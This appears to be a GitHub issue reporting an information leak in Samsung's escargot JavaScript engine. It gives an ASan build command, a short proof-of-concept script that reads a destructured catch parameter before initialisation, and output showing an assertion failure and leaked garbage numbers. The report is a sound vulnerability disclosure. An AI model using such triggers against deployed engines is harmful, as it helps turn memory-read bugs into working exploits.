Samsung/escargot

Infoleak

Opened this issue · 0 comments

commit: d398f1e

build setting:

cmake -DCMAKE_CXX_FLAGS=-fsanitize=address -DESCARGOT_MODE=debug -DESCARGOT_OUTPUT=shell -GNinja

poc.js:

var v0 = false;
try {
try { throw {}; } catch ({a = (print(a), b), b}) { }
} catch (e) {
v0 = true;
}

Bash Result:

/escargot ./poc.js
escargot: /home/fuzzer/escargot/src/runtime/Object.h:648: bool Escargot::ObjectGetResult::isDataProperty() const: Assertion `hasValue()' failed.
Aborted
/escargot ./poc.js
/escargot ./poc.js
83456213.01425552
/escargot ./poc.js
-1.7740938470966771e-181
/escargot ./poc.js
/escargot ./poc.js
-60.507442331163475